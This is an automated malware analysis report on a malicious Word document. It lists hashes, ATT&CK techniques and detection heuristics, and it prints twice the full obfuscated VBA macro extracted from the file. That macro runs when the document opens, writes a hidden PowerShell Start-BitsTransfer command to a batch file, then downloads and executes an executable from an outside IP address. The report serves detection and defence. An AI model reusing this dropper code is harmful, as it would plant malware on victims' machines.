Office (OLE) / .DOC malware analysis — malicious · 63fc612c46d976a3

MALICIOUS

Office (OLE) / .DOC

630.5 KB Created: 2021-11-11 22:29:00 Authoring application: Microsoft Office Word First seen: 2021-11-24

MD5: 2d89365f7751f810ed46b63bc2011bea SHA-1: ab080fecb8b98b96a8cdbd9cc257b98e673c5dd9 SHA-256: 63fc612c46d976a38b2cc7ccfa8cf102730105264b996b2be8975db9d27115fb

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1105 Ingress Tool Transfer T1566.001 Spearphishing Attachment

The VBA macro within the document is designed to execute upon opening, as indicated by the Document_Open subroutine. It constructs and writes a PowerShell command to a batch file located at C:\Users\Public\Documents\god.bat. This command uses Start-BitsTransfer to download an executable from http://18.159.62.193/jv/t8/shrrico.exe to C:\Users\Public\Documents\bornexist.exe and then executes it. The presence of the 'Enable content' prompt and the macro's behavior strongly suggest a downloader or dropper functionality.

Heuristics 7

VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER

The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
Matched line in script
```
Private Sub Document_Open()
```

GetObject call high OLE_VBA_GETOBJ

GetObject call

Matched line in script

Set customerexpect = GetObject(attackper & "w:0D43FE01-F" & CInt(0.2) & "93-11CF-8940-00A0C905422" & CInt(7.8))

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1174 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1174 bytes
SHA-256: `e5d140ecdbb62edde920638e9d2da44368e83eb735f48bbd2601c6bd2c359f96`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() suddenlycivil = "p^owers" walkalways = Mid("ddasbatds", 5, 3) attackper = Mid("gasnedsaf", 4, 2) challengeprogram = "he^ll" Set customerexpect = GetObject(attackper & "w:0D43FE01-F" & CInt(0.2) & "93-11CF-8940-00A0C905422" & CInt(7.8)) assecurity = "C:\Users\Public\Documents\god." & walkalways Set customerexpect2 = customerexpect.CreateTextFile(assecurity) customerexpect2.WriteLine suddenlycivil & challengeprogram & " -w hi sl^eep -Se 31;Sta^rt-BitsTr^ans^fer -Source htt`p://18.159.62.193/jv/t8/shrrico.e`xe -Dest C:\Users\Public\Documents\bornexist.e`xe;C:\Users\Public\Documents\bornexist.e`xe" customerexpect2.Close GetObject(attackper & "w:13709620-C279-11CE-A49E-44455354000" & CInt(0.3)).Open (assecurity) Set customerexpect = Nothing End Sub Attribute VB_Name = "Module1" Sub bylose() ' ' bylose Macro ' 1Y9EPHD78LD1 ' End Sub

SHA-256: e5d140ecdbb62edde920638e9d2da44368e83eb735f48bbd2601c6bd2c359f96

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
suddenlycivil = "p^owers"
walkalways = Mid("ddasbatds", 5, 3)
attackper = Mid("gasnedsaf", 4, 2)
challengeprogram = "he^ll"
Set customerexpect = GetObject(attackper & "w:0D43FE01-F" & CInt(0.2) & "93-11CF-8940-00A0C905422" & CInt(7.8))
assecurity = "C:\Users\Public\Documents\god." & walkalways
Set customerexpect2 = customerexpect.CreateTextFile(assecurity)
customerexpect2.WriteLine suddenlycivil & challengeprogram & " -w hi sl^eep -Se 31;Sta^rt-BitsTr^ans^fer -Source htt`p://18.159.62.193/jv/t8/shrrico.e`xe -Dest C:\Users\Public\Documents\bornexist.e`xe;C:\Users\Public\Documents\bornexist.e`xe"
customerexpect2.Close
GetObject(attackper & "w:13709620-C279-11CE-A49E-44455354000" & CInt(0.3)).Open (assecurity)
Set customerexpect = Nothing
End Sub

Attribute VB_Name = "Module1"
Sub bylose()
'
' bylose Macro
' 1Y9EPHD78LD1
'
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.